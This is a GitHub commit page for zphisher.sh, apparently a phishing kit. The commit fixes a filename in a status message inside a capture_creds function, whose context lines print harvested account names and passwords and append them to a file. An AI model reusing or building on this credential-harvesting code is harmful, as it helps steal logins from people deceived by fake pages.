Skip to content

Commit 4c65e37

Browse files
committed
Minor Issue Fixed
1 parent a44b9bf commit 4c65e37

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

zphisher.sh

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -363,7 +363,7 @@ capture_creds() {
363363
IFS=$'\n'
364364
echo -e "\n${RED}[${WHITE}*${RED}]${GREEN} Account : ${BLUE}$ACCOUNT"
365365
echo -e "\n${RED}[${WHITE}*${RED}]${GREEN} Password : ${BLUE}$PASSWORD"
366-
echo -e "\n${RED}[${WHITE}*${RED}]${BLUE} Saved in : ${ORANGE}username.dat"
366+
echo -e "\n${RED}[${WHITE}*${RED}]${BLUE} Saved in : ${ORANGE}usernames.dat"
367367
cat .server/www/usernames.txt >> usernames.dat
368368
echo -ne "\n${RED}[${WHITE}*${RED}]${ORANGE} Waiting for Next Login Info, ${BLUE}Ctrl + C ${ORANGE}to exit. "
369369
}

0 commit comments

Comments
 (0)